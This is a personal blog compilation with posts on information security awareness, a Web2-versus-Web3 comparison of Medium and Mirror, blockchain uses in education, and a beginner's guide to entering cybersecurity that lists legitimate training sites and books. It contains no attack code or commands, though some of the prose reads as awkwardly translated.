Jimm Wayans

Talking about Information Security Awareness

Information Security Awareness

In the current society, with the rapid development of new-generation information technologies such as artificial intelligence and big data, people’s lives have become more and more convenient and fast. However, when we enjoy technological life, we don’t realize that we have been exposed to dangers such as information fraud, information capture and information harassment. Compared with the traditional means of fraud in the past, today’s criminals take advantage of the efficiency of technology to take advantage of network security loopholes to carry out fraud, making people even more difficult to guard against. Perhaps it is some small negligence in life that may cause personal information leakage and cause information security risks.

information security awareness

The information security has changed people’s work, study and living habits, making people more dependent on computer networks. While enjoying the various conveniences brought by the information security, people often lack information security awareness and ignore information security guarantees. People’s information security awareness is gradually established through the awareness and understanding of information security. This post analyzes and discusses the connotation of information security awareness and the current situation of information security development, and puts forward effective measures to strengthen information security awareness.

The importance of information security

Information security is the cornerstone of informatization construction and the guarantee for the normal operation and effectiveness of information networks. Information security has become an overall problem affecting national security, social stability and economic development. A country’s ability to obtain information and ensure information security is a symbol of comprehensive national strength, economic competitiveness and viability in the 21st century, and a “killer copper” for future international competition. The development of society and the arrival of the digital network era have changed many aspects of people’s lives. The universal deposit and withdrawal of bank deposits, deposits and withdrawals in different places, surfing the Internet, online shopping and online transactions all bring convenience to people’s lives. But while computers and networks bring convenience and speed, it also imposes some conditions. Nowadays, people have less cash in their pockets and more various cards, such as bank credit cards, medical and social security cards, salary cards and so on. These cards really make people convenient, but just because these cards are so convenient that when people use them, the computer system only recognizes the cardholder and does not identify the real owner of the card, so people have to for the safety of the information on the card Set passwords and more for various cards. This is an information security issue. People set various passwords for the security of their information.

With the development and popularization of the Internet, network viruses, network attacks, and network crimes have rapidly reached an unprecedented rampant level. Today’s viruses can spread rapidly across the world within ten minutes, disrupting the global economy in an instant. Network security has become the focus of global attention, and hackers and computer viruses are threatening the normal operation of various departments. When people increasingly rely on computer networks, they find that the network is so fragile. Therefore, information security has been paid more and more attention all over the world, and information security has become an important symbol to measure whether an information system is perfect.

The International Organization for Standardization (ISO) defines information security as “technically and managerially established security protection for data processing systems to protect computer hardware, software and data from damage, change and disclosure due to accidental and malicious reasons”.

Main content of information security

The main contents of information security include: confidentiality, integrity, availability, authenticity and validity.

Information security mainly refers to the maintenance of confidentiality, integrity and availability of information, that is, the use of computer software and hardware technology, network technology, key technology and other security technologies and various organizational management measures to protect information during its life cycle. In all links of generation, transmission, exchange, processing and storage, its confidentiality, integrity and availability will not be destroyed.

Confidentiality means: Ensuring that only those who have been granted specific permissions have access to information. The confidentiality of information varies according to the number of objects that are allowed to access the information. The information that everyone can access is public information, and the information that needs to be restricted from access is sensitive information or secret information. According to the importance of the information and confidentiality requirements, the information is divided into Different levels of confidentiality, such as internal military documents are generally divided into three levels: secret, confidential and top secret. Authorized users can operate confidential information according to the authorized operation rights. Some users can only read information, and some users can both read and write.

Integrity of information means: to ensure the correctness and completeness of information and processing methods. On the one hand, information integrity refers to the fact that no tampering, loss of information, or wrong information occurs in the process of using, transmitting, and storing information; on the other hand, it refers to the correctness of information processing methods, improper operations, and It may cause loss of important files, or even paralysis of the entire system.

Availability of information refers to ensuring that authorized users can indeed access the information they need when they need it. That is, information and related information assets can be obtained immediately when the authorized person needs them. For example, interruption of communication lines and network congestion will cause information to be unavailable for a period of time and affect normal business operations. This is the destruction of information availability. Systems that provide information must be able to withstand attacks appropriately and recover from failure. In addition, the authenticity and validity of information must be guaranteed, that is, business transactions and information exchanges between organizations or between organizations and partners are trustworthy.

Information Security Development Status

Information security can be regarded as an emerging industry in the process of my country’s informatization construction. In general, the development trajectory of information security includes the following three stages:

⑴The budding stage

Before 2005, various industries and departments in China began to develop awareness of information security: from the initial “emphasis on information construction” but “ignoring the construction of security systems” to “awareness of the importance of security” and “hope to realize information security” Security”, but think that information security is very mysterious, and do not know where to start. At this stage, customers in various industries are consciously learning and accumulating information security knowledge, and conducting extensive exchanges with authorities in this field to understand their technologies, concepts, products, and services. At the same time, some small-scale and sporadic information security constructions have also appeared in some enterprises and departments, but they have not achieved scale and systematization; moreover, for information security in this period, the government’s macro-policy is more appealing. There are many, but there are relatively few specific affairs to be promoted. Although it seems very lively, there are very few actual information security constructions.

⑵ outbreak stage

After 2005, the needs of various domestic industries and departments for information security construction have changed from “spontaneous” to “conscious”. The customer has basically understood the construction content and significance of information security. Many industry departments have begun to plan and deploy internal information security construction. Leaders of various industries attach great importance to it and continue to increase investment. Therefore, information security has become the top priority of this phase of construction. In a sense, the explosion of demand in the information security market can be said to be caused by the “debts” of various industries in information security over the years.

⑶ popularization stage

When information security construction is integrated with the overall information construction of various industries, information security is one of the key links in IT construction. It is as important and ubiquitous as air, but it is not easy to be noticed.

In 3 to 5 years from now, the information security market will maintain a high-speed and super-scale development momentum, and telecommunications, government, and finance will be the industries with the greatest demand for information security. Because the telecommunications industry and the financial industry are industries with large investment, fast development, high degree of informatization, complex needs, and relatively severe security situation, while government departments play a role model to the outside world due to their high position and urgent security needs, so There will also be increased investment in information security.

The biggest security issue in the 21st century is information security, as well as economic security, political security, military security, social security, technological security, and cultural security based on information security. The weakest link in information security is likely to be careless people, not software bugs. Hackers have captured many extremely complex networks, not only relying on superb technology, but also exploiting human weaknesses. Only by raising people’s security awareness to a very high level can we fundamentally reduce the risk of information security.

Effective Measures to Improve Information Security Awareness

A good information security environment is the need to further deepen reform and opening up and promote my country’s socialist modernization, and it is also the foundation of national security. The premise of a good information security environment is that all citizens must have a strong awareness of information security and a high degree of vigilance in protecting sensitive national information.

1. Improve the information security awareness of leading cadres

Leading cadres at all levels are not only the main body of generating, transmitting, utilizing and storing sensitive information, but also the main target of stealing sensitive information. Therefore, to improve the awareness of information security, the quality of information security of leading cadres at all levels is particularly important. Because only when leaders raise their awareness of information security can they seriously grasp information security work, strictly implement various laws and regulations, and strictly organize and implement information security inspections, can information security work be effective and well done.

2. Improve the information security awareness of confidential personnel

Secret-related personnel are important managers of secret information security, and are responsible for sending, receiving and keeping confidential secret information. Doing a good job in the team building of secret-related personnel and improving their quality is the key to doing a good job in information security. To improve the quality of secret-related personnel, in addition to improving ideological understanding, cultivating a scientific and rigorous style of work, and strictly abiding by laws and regulations and various rules and regulations, professional training on information security and confidentiality under high-tech conditions is required to enable them to master the use of modern technical tools to manage documents. Knowledge of archives, familiarity with their own business, high judgment and insight into phenomena that may cause leakage of secrets, and mastering a certain level of anti-theft technology. 3. Improve the information security awareness of professional and technical personnel

Professional and technical personnel are the new force of information security management in our country and the operators and maintainers of information security. Professional and technical personnel must have sufficient information security knowledge, fully understand the security performance of relevant security technologies, operating systems, and application software, keep track of security news and security technology developments, and develop good information security habits. The government should actively promote exchanges between my country’s information technology professionals and foreign countries in the cultivation of information security awareness. Learning from foreign successful experience, using foreign research results, drawing on foreign educational strength, and introducing foreign excellent teaching materials and related theories is a shortcut to rapidly improve the training level of information security awareness of professional and technical personnel in our country.

3. Raise the awareness of information security of the whole people

In order to enhance the citizens’ awareness of information security and improve the awareness of national information security, it is necessary to carry out information security education for the whole people. In order to ensure the security of the party and the state’s secrets under any circumstances, the most fundamental thing is to do a good job in ideological education and improve the information security awareness of the whole people. All industries and government information management departments at all levels should use public opinion and media to publicize the importance of information security; compile information security knowledge manuals to strengthen self-protection capabilities in information security; establish a set of security training systems for users of different levels. Gradually improve the technical level of computer users through hierarchical training; organize the study of laws and regulations on information security work, popularize common sense of information security, and introduce information security technologies. Only when the information security awareness of the whole people is enhanced, information security will be fully guaranteed.

What is Web3

What is Web3

What is Web3

First, lets see the previous generations:

Web1.0(1980-2000)

The first wave of the Internet began in the 1980s, and the iconic event was that two computers “communicated” through the customs clearance protocol. This protocol is the TCP/IP protocol created in 1983.

The network (World Wide Web) in this period can’t do too much “interconnection”, and more information is read-only.

Netscape (Netscape) is typical of this period, publishing information on the Internet.

Image
The network in this period had the following pain characteristics:
  • High barriers to access technology
  • Index function without information
Can’t interact with users, can’t record user data

Web2.0 (2001-present)

After the dot-com bubble burst in 2000, a second wave began to sprout. Many companies have begun to improve the pain points of the Web1.0 model, including search functions and allowing users to upload content.
The Web 2.0 products that emerged at this time were more interactive, and users could create, upload and share their content.
Examples of this include Google and Microsoft building their Gmail and Outlook products on top of SMTP (Mail Transfer Protocol) in 1981. While the SMTP protocol itself is open and transparent, Gmail and Outlook are closed platforms owned by the two tech giants. Therefore, the software that Web2 users are actually interacting with is the product built by these technology giants based on Web1 open source software.
Facebook (now renamed Meta) is a typical Web2 technology giant. It creates wealth by allowing users to read, write, interact and socialize on the platform, depositing a large amount of data and traffic.
web3.0

Web 3.0 (concept was born in 2014)

Web 3.0 (hereinafter referred to as Web3), was first proposed by Gavin Wood, the co-founder of Ethereum, in 2014, and it suddenly attracted everyone’s attention at the end of 2021.
Web3 includes the characteristics of Web1 and Web2: transparent, open and open source network, users can read, write and upload content, and can also exchange value.
From a conceptual understanding, Web3 represents the next era of the Internet, and the Internet is shifting towards a more democratic paradigm. Web3 also stems from the change in people’s attitude towards the value of the Internet today: the giants of Web2.0 control the Internet and everyone’s data, so many people have the idea of ​​​​creating a truly “collectively owned” Internet.
The core of Web3 is to allow users not only to read and write content, but also to own their own content, so that they will not be swayed by centralized technology companies arbitrarily modifying the rules. Web3 restores the openness of Web1, and the rules of all market participants are standardized, so that large airliner companies will not stifle innovation and market competition.
The corporate form under Web3 has also changed:
 

Comparison of Web2 products and Web3 products

Next, let’s compare two content creation products (Medium and Mirror) to see the differences between Web2 and Web3 products.
Medium
Is Medium Worth Using | Journal
Medium is the world’s top content creation/blogging platform (a bit similar to Zhihu in China but with better content quality) . The founder Evan Williams is also the co-founder of Twitter and Bolgger. As of May 2021, the platform has 180 million monthly live and 750,000 paid subscribers*.
Compared with traditional blogging platforms, its biggest feature is that it refines the writing and reading experience, and at the same time it mainly shares and disseminates content based on users’ social relationships.
Creators do not need to pay any fees for uploading works, but if they want to earn income through content, they need to add the content to the paywall section.
Readers are free to read general content, but they need to pay a monthly membership fee of $5 or $50 per year to read the content in the paywall section.
Medium will distribute the reader’s membership fee to the authors who have read the article according to the calculated ratio according to the parameter of the reader’s reading time. The monthly income of top content creators may exceed 50,000 US dollars. The platform will also give top creators additional subsidies every month to encourage creators to continuously produce high-quality content and expand the number of fans.
Medium is currently valued at $600 million, and its most recent financing was $57 million in January 2021 from A16Z and Google.
Mirrow
Mirror.xyz
Mirror is a blockchain-based content creation platform whose mission is to “revolutionize the way ideas are expressed, shared, and monetized.” As long as you have an Ethereum wallet, you can access the platform to create and enjoy benefits. Their goal is to provide a way for content creators to publish their work confidently and securely, while maintaining control over digital rights.
Mirror was founded by Denis Nazarov, a former partner of A16z (also an investment institution of Medium). It received a US$10 million investment from Union Square Ventures in July 2021 and is currently valued at US$100 million.
As of March 2022, Mirror has raised more than 8,000 Ethereum (approximately $24 million) for content creators.
The following figure is the interface of entering Mirror after linking the wallet:
Image
Mirror currently provides basic functions for creators, including publishing articles (Entry Editor), crowdfunding (Crowdfunds), digital collections (Editions), auctions (Auctions), and splits (Splits).
Crowdfunding: Anyone can initiate or participate in crowdfunding through Mirror. Supporters can deposit Ethereum tokens (ETH) to fund the initiators and exchange tokens. Any project or idea can be capitalized (tokenized). Many writers have launched crowdfunding projects on Mirror, using future copyright/royalty income to obtain current funds to maintain their creation and life.
Digital collection (NFT): All content published on Mirror can be made into NFT after paying a certain handling fee.
(NFT literally means non-homogeneous tokens. Traditional encrypted digital currencies are homogeneous (Fungible Token), there is no difference between any two tokens, they can be replaced with each other, and can often be split into smaller units. For example, Bitcoin. NFT is unique and cannot be replaced by other NFTs, and often cannot be divided into smaller units. For example, an NFT of a painting represents the painting itself and cannot be replaced by other NFTs. Blockchain technology It is a decentralized digital ledger technology, and NFT is a way of digitizing assets based on blockchain technology. In actual scenarios, NFT does not refer to a specific form of digital assets. On the contrary, the scope of NFT It is very broad and can be in any form you can imagine, such as pictures, music, videos, online collections, or even a tweet. Any information such as the creation, modification, and transaction of these NFT digital assets will be recorded one by one on the digital ledger of the blockchain.)
Auctions: NFT auctions can be supported on Mirror.
Ledger sharing: Ledger sharing on Mirror is an automatic way to share the value you generate with multiple entities. A split is a payable smart contract that transfers value to multiple addresses on Ethereum. Sharding can be a way to reward your collaborators, people who motivate you, or donate the proceeds of your work.
From the perspective of product form, the Mirror platform is more like a content crowdfunding platform. The digital content published on it is endowed with value through NFT tokenization, and the ownership of a single piece of content can be sold to multiple parties through crowdfunding. name investors.
The set of tools provided by Mirror for content creators has raised “content monetization” to a new level, and there will even be special content investors who can earn future profits through their keen sense of high-quality creators.
At the same time, the Mirror platform solves the following problems through blockchain technology:
  • Content is censored and deleted
  • Malicious comments
  • The content is randomly quoted or plagiarized
  • The economic interests of creators are determined by the platform
Exclusive ENS domain name: Mirror does not need to log in through email or other accounts, but integrates the decentralized domain name service ENS* to realize the creator’s right. The mirror.xyz subdomain name at the beginning serves as the home page of its own content publishing platform. All information is publicly viewable on the blockchain, so anyone can verify whether an item of content was written by a specific Ethereum account.
(Note: Ethereum Name Service is Ethereum Name Service, which can provide readable name resolution services for blockchain addresses, Web3 storage resources, and even social information in a decentralized form, and is also the most widely integrated blockchain naming service. standard.)
Signature on-chain: The content after signature confirmation will be displayed at the bottom of the content page (as shown in the figure above) with three sets of data: “Arweave* Transaction ID”, “Contributor Ethereum Address*” and “Content Summary”. All information is publicly viewable on the blockchain, so anyone can verify whether an item of content was written by a specific Ethereum account. All published entries and every content change need to be signed by the user with a signature key, and then published to store data on Arweave. All published entries and every content change need to be signed by the user with a signature key, and then published to store data on Arweave.
(Note: Arweave is a decentralized cloud storage solution, which aims to use blockchain to subvert the traditional storage market. Different from other cloud storage solutions, Arweave not only has the security advantages of decentralized storage, users can also choose one time permanent storage service.Ethereum (Ethereum) is a decentralized open source public blockchain platform with smart contract functions.An Ethereum address represents an Ethereum account, and an address is an account For external accounts, the address represents the last 20 bytes of the account’s public key (usually starting with 0x, such as 0xcd2a3d9f938e13cd947ec05abc7fe734df8dd826, the address uses hexadecimal notation, once the content is sent to Ethereum will no longer be deleted and tampered with)
Image
Compared with the architecture of Medium, Mirror is content-centric.
The browser obtains the content hash of the content based on the domain name system (ENS) of the blockchain, and then obtains the web application itself (Arweave) from a decentralized storage system. When the user interacts with the web page, the web page Instead of initiating an application like a specific server, there is no Google server, no medium server, but to a decentralized storage system, or indexer to read and write.
Let’s take a closer look at the difference between the two product architectures. *
Medium (Web2 product)
1. Front-end: For the web front-end, it usually refers to the front-end part of the website, including the presentation layer and structural layer of the website: the structure of the Web page, the visual appearance of the Web, and the interactive realization of the Web level.
Front-end code (usually written in JavaScript, HTML, and CSS) defines a product’s user interface logic. Such as what a Medium website looks like and what happens when a user interacts with some of the elements on the page (e.g. buttons, status bar, small icons, etc.).
2. Backend: The backend is more about interacting with the database to process the corresponding business logic. What needs to be considered is how to implement functions, data access, platform stability and performance, etc.
The backend code (written in languages ​​such as Node.js, Java, or Python) needs to have a very clear definition of the business logic of the Medium website. For example, when a new user signs up, publishes a new blog, or makes a comment on someone else’s blog, how does the website interact with the user.
3. Database: The website must have a database for storing network data, also known as data space.
Now most websites are dynamic websites developed by ASP and PHP, and website data is stored in a dedicated database. Website data can be directly published to the website database through the website background, and the website will call these data. To store user information, user uploads, tags, comments, likes, etc., the database needs to be constantly updated.
Take Medium as an example; the user tries to log in to Medium and upload content, the user enters the user name and password on the front end/client, and initiates an HTTP/HTTPS request (Request) to the back end/server. After receiving the request, the back end initiates a query to the database (Query ), check whether the user name and password are correct in the database, and return the result and other information of the user to the backend after the query is completed. After receiving the data, the backend initiates an HTTP/HTTPS request (Response) to the frontend. After receiving the request, the frontend rendered on the page. Appeal All of these codes are hosted on centralized servers and sent to users through Internet browsers.
Mirror (Web3 product)
1. Signature: The first difference of Web3 products is the front-end login method, users do not need to have a set of account and password system.
Similar to how Google allows users to access various applications without creating multiple accounts, crypto wallets can have a similar function in web3. Crypto wallet users can connect to the decentralized protocol at any time and start using it without submitting personal information or registering an account. Web3 applications do not need to call the database (web3 does not have such a centralized database) to read user data, because all user data is public on the chain. Users need to link a wallet (the web page is a browser extension, and the mobile terminal is a separate app), and sign a transaction to log in.
2. Front-end: The front-end user experience is not much different from Web2, but the front-end code is stored on a decentralized server.
3. Node management: Mirror runs on a decentralized network like Ethereum, and each node in the network keeps a copy of all states on the Ethereum state machine, including codes and data related to each smart contract. For the front end to communicate with the smart contract and make function calls, it needs to interact with one of the nodes.
This is because any node can broadcast a request to execute a transaction on the EVM (Ethereum Virtual Machine). Therefore, in addition to building a set of Ethereum full nodes by yourself, you can also use API services provided by third-party service providers to interact between the front end and smart contracts.
4. Virtual machine: The virtual machine is the core module in the Web3 architecture. Different from Web 2 applications, Web 3 has no background and database, and does not require a centralized web server to store back-end logic.
A virtual machine (Virtual Machine) simply refers to a code running environment built on a decentralized blockchain. At present, the mainstream ones on the market are the Ethereum Virtual Machine (Ethereum Virtual Machine, EVM) and the Ethereum-like virtual machine. Based on the Account model, it runs the smart contract code internally in a completely isolated manner from the outside, realizing a Turing-complete smart contract system. Ethereum requires thousands of people running a piece of software on their personal computers to power the network. Each node (computer) in the network is used to run the Ethereum virtual machine. Think of the EVM as an operating system that understands and executes software written in a specific programming language on Ethereum. EVM assumes the responsibility of database + backend within the Mirror product architecture, data is stored on the chain, and smart contracts process the data.
5. Smart contract: a program that executes code on the blockchain when certain conditions are met, and the parties approve and maintain its operation by digitally signing the contract.
The smart contract is actually the same piece of code stored in the blockchain (each node). This code defines the rules of the contract. When the input meets the required conditions, the smart contract code in each node will be automatically executed independently, and Automatically cross-check that all execution results are the same.
6. External storage: Because of the ledger synchronization property of the blockchain, the storage on the chain is very expensive, so most of the data that takes up space and is not the most important will be stored on a third-party decentralized storage platform such as IPFS/Swarm /Arweave.
Take Mirror as an example: the user connects to the wallet through the browser interface. Write an article, sign it through the wallet, and send the transaction to the chain. Articles will be sent to arweave through the background of mirror (currently mirror is helping users pay for uploading to arweave through a centralized account). The transaction containing the arweave transaction information is then uploaded to Ethereum for packaging.
During this period, the wallet will interact with the provider to connect to Ethereum, and Mirror’s own server will also send and query transactions through the provider and feed back to the front end.
 

Summary

By comparing the two products, Medium and Mirror, we can see that blockchain distributed storage provides a commercially feasible solution for information transparency and non-tampering from the technical level.

As an emerging concept, Web 3 is still in the early stages of development. From the architectural level, it is determined that a new set of infrastructure is required, including various products and services, from the underlying network stack to the consensus model or virtual machine.
Although there are also some challenges at the regulatory level, compared with Bitcoin, the narrative and positioning adopted by Web3 is very moderate in terms of political stance, and it is also more pragmatic and easy to be accepted by the mainstream.
Application of Blockchain Technology in Education and Other Sectors

Application of Blockchain Technology in Education and Other Sectors

Blockchain technology is regarded as another disruptive technology after cloud computing, Internet of things and big data, which has received high concern by the governments, financial institutions and the enterprises. Essentially, blockchain technology is a kind of technical scheme to maintain a reliable database by means of decentralization and high trust. Its core technologies include distributed accounting technology, asymmetric encryption algorithm and intelligent contract. Furthermore, it has the distinguished characteristics such as decentralization, consensus mechanism, traceability and high trust. Nowadays, as the underlying technology of bitcoin, #blockchaintechnology is not only applied in the field of finance, but also has great potential in education.

Application of Blockchain Technology in Education and Other Sectors

What’s more, blockchain technology is expected to play an important role in the construction of internet +education ecology to promote the reform of education system. According to the experience and enlightenment from the application of blockchain in the financial field, the blockchain in education is mainly embodied in six areas of application: establishing individual knowledge on big data, creating intelligent education platform, developing degree certificate system, constructing new ecology of open education resources, achieving “self-organization” operation of networking in learning communities and developing the decentralization of education system.

As seen:

  • In the financial field, global banking giants have formed the R3 Alliance, including more than 40 large international financial institutions such as HSBC, UBS, and Bank of America, to jointly develop blockchain technology. Nasdaq in the United States took the lead in launching Linq, a securities trading platform based on blockchain technology, which became an important milestone in the trend of decentralization in the financial securities market. Clearly, it is necessary to pay close attention to the impact of blockchain and other technologies on the financial sector.
  • In the field of technology, IBM and The Linux Foundation have established a dedicated blockchain open source project Hyperledger Fabric, which has entered the substantive development stage. The company will provide Watson API on the Watson IoT platform to help enterprise customers and developers develop and test IoT applications based on cloud computing, in order to realize the use of blockchain to lead the autonomy of the Internet of Things.
  • In the field of energy, foreign companies have launched energy blockchain projects, such as: Germany’s Siemens and New York’s new ventures have cooperated to apply blockchain technology to the microgrid power trading market; American energy company LO3 Energy and Bitcoin development company Consensus System Cooperated to build TranActiveGrid, an interactive grid platform based on blockchain system, for a small number of residents in the Gowanus and Park Slope neighborhoods of Brooklyn, New York.
  • In the field of food, a research report from the University of Saad in the United Kingdom pointed out that if the blockchain technology is applied to the food supply chain, by making the data of food transparent, it may reduce the phenomenon of food waste, thereby solving the problem of food waste. In addition, Walmart is also trying to use blockchain technology to record the source of food, trying to let consumers have more food information, so as to improve some of the current chaos in the food industry.
  • In the medical field, Philips Medical and Tierion have cooperated to allow Philips Medical to use blockchain technology to complete the authentication of medical records and the privacy protection of patients. Blockchain technology helps to solve the large-scale data quality problems that the medical industry is currently suffering from, and provides the medical industry with a unique source of authentic data, so that the system will no longer suffer from human errors or manual data reconciliation, thereby solving the problem of medical data trust.

Enlightenment on the application of blockchain in the field of education

The application of blockchain technology is bringing disruptive changes to the financial sector and creating new business opportunities. By studying the application mode of blockchain technology in the financial field, it is found that its value to the innovation and development of the financial field is mainly reflected in: eliminating intermediate trading platforms, reducing transaction costs; realizing real-time transaction settlement, improving transaction efficiency and asset utilization; distribution The transaction data is stored in a format, which cannot be tampered with and has high security; the automatic operation of the transaction process is realized based on the #smartcontract. The application scenarios and models of blockchain technology in the financial field provide the following enlightenment for its application in the education field:

(1) Strengthen the protection of intellectual property rights and build an educational trust system. The traceability of digital currency can reduce the bank’s expenditure on compliance verification and auditing such as anti-money laundering and anti-fraud, and effectively control the occurrence of illegal activities such as tax evasion and money laundering. In the field of education, the traceability of blockchain technology can be used to realize the copyright protection of educational assets and intellectual achievements, and solve the problem of intellectual property disputes from the source. In addition, digital currency storage on the blockchain has high security and reliability. In the field of education, important information such as student grades, personal files, and academic certificates can be stored on the blockchain to prevent information from being lost or maliciously tampered with. , build a safe, credible, and non-tamperable student credit system, and help solve the current problems of lack of student credit and global academic fraud.

(2) Optimize the educational business process to achieve efficient and low-cost educational resource transactions. In terms of cross-border payment, the blockchain uses the characteristics of decentralization to abandon the role of intermediary banks and realize point-to-point fast and low-cost cross-border payments. In terms of educational resource sharing, the use of distributed ledger technology to realize the direct connection between users and resources can simplify the operation process and improve the efficiency of resource sharing, so as to promote the open sharing of educational resources and solve the problem of resource islands. In terms of educational resource transactions, the use of decentralized features eliminates transaction intermediary platforms and realizes point-to-point connections between consumers and resources, thereby reducing expenses, simplifying operating procedures, and creating an efficient and low-cost educational resource transaction platform.

(3) Use the characteristics of decentralization to build a decentralized education system. Blockchain technology is applied to supply chain financial business. By eliminating intermediate transaction agencies and reducing human intervention, costs and operational risks are reduced. Wave has reached a cooperation agreement with Barclays Bank to put the letter of credit, bill of landing number and documents of the international trade process on the public chain, and conduct authentication and non-tamperable verification through the public chain, establishing completely transparent “rules of the game” to achieve verification Decentralization of rules. In the field of education, blockchain can be used to develop a decentralized education system, breaking the monopoly of traditional education services by schools or government agencies, so that any institution with educational qualifications can provide educational services and issue valid academic certificates. The effective integration of formal education and non-formal education promotes the reform of the education system for all people to participate in.

(4) Distributed storage and recording of credible learning data to achieve efficient connection between schools and enterprises. Blockchain technology makes the securities trading market more open, transparent, green, fair and efficient, turning the traditional model that was highly dependent on intermediaries into a decentralized flat network transaction model, and realizing distributed storage and recording of data. In the field of education, students’ personal information, academic performance, growth records and other content can be stored in a similar way, distributed in the education system, and can be shared with other schools or recruiting units on the basis of ensuring the authenticity and security of the information. Data content, as an important basis for student job interviews. Use distributed ledger technology to show employers their academic achievements and professional skills, build a bridge for communication between students and enterprises, and establish a new model of school-enterprise cooperation, so as to achieve efficient connection between students and employers.

(5) Develop educational smart contracts and build a new mode of network resources and platform operation. The smart contract technology in the blockchain can automate a large number of manual and semi-manual verification and management tasks in the current financial transaction process, and improve the intelligence of the transaction system. In the construction of open educational resources, using the transparency and automatic execution of smart contracts can realize the automatic execution of resource uploading, certification, transfer, sharing, etc., reduce the cost of resource sharing, improve the efficiency of resource sharing, and build a new form of network resource circulation . In addition, smart contracts can be used to build an efficient and intelligent online learning community, realize the “self-organization” operation of the learning community, monitor the ecological environment of the community in real time, automatically block and delete inappropriate speech, and create a positive community atmosphere.

Challenge of Using Blockchain in Education

Blockchain technology achieves the anonymity effect by isolating the connection between the transaction address and the real identity of the address holder, and prevents the disclosure of user privacy due to the transparency of transaction information. However, such protection can still be achieved by observing and tracking block information and user IDs. Track down the user’s personal information. Therefore, the application of blockchain technology in the field of education faces the risk of the privacy of teachers and students being leaked, mainly from the following two aspects: First, all transaction information is open and transparent, and any information can be tracked and queried, and then certain conclusions can be inferred. Or predict the status and behavior of teachers and students, which is not conducive to the protection of personal privacy of teachers and students; second, the security of the blockchain is guaranteed by algorithms. In theory, only more than 51% of node users are hacked at the same time. Data information however, with the development of mathematics, cryptography and computing technology, it is difficult to guarantee that the algorithm will not be cracked in the future, resulting in the leakage of teacher and student information.

Twitter: @jimmwayans | www.jimmwayans.com

How to be a Hacker

How to be a Hacker or a Cybersecurity Expert?

So you want to be a Hacker?

Recently I’ve been reading a ton of questions, posts and general discussion about getting into the ‘Information Security’ game, and in my opinion at least it’s typically followed up by a fair amount of misleading information. That might be a little harsh considering I’m sure it’s good intentioned, it’s also even possible that the advice worked for them (there is no one size fits all advice) but I thought I’d lay my thoughts out here in the hope of helping a new budding hacker or infosec enthusiast move forward.

I want to play sport, where should I start?
This vague, open ended and very ambiguous question is very similar to someone asking how they should go about getting into information security. The first thing to realize is, there is a huge range of information security fields, and within each of those huge fields, is a lifetime’s worth of learning content. Just like picking a sport there is no ‘best’, it’s simply sometimes area’s you may enjoy more than others. Off the top of my head here are some example area’s that is by no means exhaustive:

How to be a Hacker

How to be a Hacker

  • Web Application Security
  • Mobile Application Security
  • Reverse Engineering
  • Malware Reverse Engineering
  • Cloud Security
  • Network Security
  • Incident Response
  • Hardware Hacking
  • IoT Hacking
  • Risks, Governance and Compliance
  • Programming / Creating Tools for Others
  • Exploit Development
  • Forensics
  • etc…

 

Some of these are more of a technical nature while others are more of a theoretical focus. I guarantee that whatever you like there are others out there who will find it boring, just as you will with what others are interested in sometimes. Right now it’s expected that if you’re reading this you may know very little about any of these area’s but what’s important is your willingness to learn and what type of motivation you have.

The Hacking Type
One trademark that is almost universal of people throughout those fields is their focus on independent, self directed learning. Unfortunately in some ways security is still considered a ‘dark art’, I mean why would anyone want to know how to break into a computer system unless they were going to do so? As a result plenty of people will show disdain to outright hostility when asking about security related questions under the false (perhaps sometimes true) assumption it’s merely a ‘script kiddie’ looking to learn to hack systems instead of wanting to learn and use that knowledge for a good purpose. It’s also a fact that the ‘learning’ resources of information security are quite disjointed with no real central repository of learning material.

The point of highlighting this is that if you wish to prosper and successfully enter into the information security field you should be prepared to jump in and find your way without waiting for someone to hold your hand and lead you down the right path. Google some of the above terms and see what sounds like fun. Despite what sometimes seems like a constant battle to find the ‘best’ field to learn, or the ‘best’ resource, or the ‘best’ way to learn often more time is spent procrastinating wondering these questions rather than dedicating the time to actually learning. Look up video’s on youtube for hacking examples – it’s ok if you don’t know what a lot of it means, but write down a list then google those terms. Use points of interest to spawn out with an ever increasing web of knowledge around topics you’re interested in.

Do I need to learn X first?
Of course you need to have a full knowledge of the OSI layer before you begin. Yes you need to read that 1000 page book on the TCP protocol. Yes you need to be proficient in 5 programming languages (at least!) before you consider hacking. Can you compile your own Linux kernel from source code? No? Don’t bother learning hacking. Actually…. all that is full of rubbish, yet it’s one of the most common responses given to people looking to learn information security. There is one requirement to becoming a decent hacker – interest. The difference between a future hacker and a script kiddie isn’t knowledge, it’s the willingness to learn.

As long as you have a vague idea of how to use a computer you’re at the starting point you can work with. Yes if you don’t have a solid understanding of how TCP works you should have that on your to-do list to look up when someone is talking about it in a hacking tutorial – but it’s ridiculous to think you need a ton of prerequisite knowledge before you’re allowed to start learning about topic’s you’re interested in. When you’re looking up how that login puzzle works on a hacking site and it uses JavaScript you’re going to learn how JavaScript works. When you read through how a buffer overflow works and it has a Python template you’ll learn some basics of Python. No, you won’t get a job as a developer in those languages at the end of it but you’ll pick up the common way’s to break the language.

Informal Learning
“Ok, I get the hint – I need to learn things myself, but can you at least give me a starting point?”

Sure, there are a ton of great free or cheap resources out there to get started depending on what topic appeals to you. Here are some examples.

Web Application Security

  • HackThisSite – Good for some basic web based challenges (link)
  • Enigma Group – Similar to Hack this site (link)
  • Hack The Box – A massive, online cybersecurity training platform (link)
  • OWASP Top 10 – Idea of what are the most common vulnerabilities (link)
  • TryHackMe – a free online platform for learning cyber security (link)
  • OWASP Broken Wep Apps – A virtual computer you can load up to practice hacking skills on your network (link)
  • Pentesting Lab – Another web focused virtual machine (link)
  • In fact anything from vulnhub that interested you is good (link)
  • The Web Application Hackers Handbook – The book on web hacking and vulnerabilities (link)

 

Reverse Engineering / Malware Reversing

  • Lena’s Tutorials – Known as pretty much one of the best introductions to reverse engineering (link)
  • The Legends of Random – Again another solid set of tutorials for reverse engineering (link)
  • Reversing: Secrets of Reverse Engineering – A good book on the foundation’s of reverse engineering (link)
  • Practical Malware Analysis – A great book focusing on reversing malware (link)
  • Malware Analysts Cookbook – Another book focusing on reversing malware (link)

 

Network Security

  • Virtual Machines dominate this category as they allow you to practice against real machines. Head to vulnhub and download any VM that looks interesting (link)
  • Metasploit Unleashed – A solid run through of the metasploit testing framework to be used in conjunction against VM’s. (link)
  • The Basics of Hacking and Penetration Testing – A very basic look at penetration testing useful for those completely new to the field. (link)
  • Metasploit – The Penetration Testers Guide – Another book focusing around the use of metasploit in penetration testing (link)
  • Because this is such a huge field often it’s breaking it down into one aspect, then researching that aspect specifically. Blogs are your best friend here. (link)

 

Exploit Development

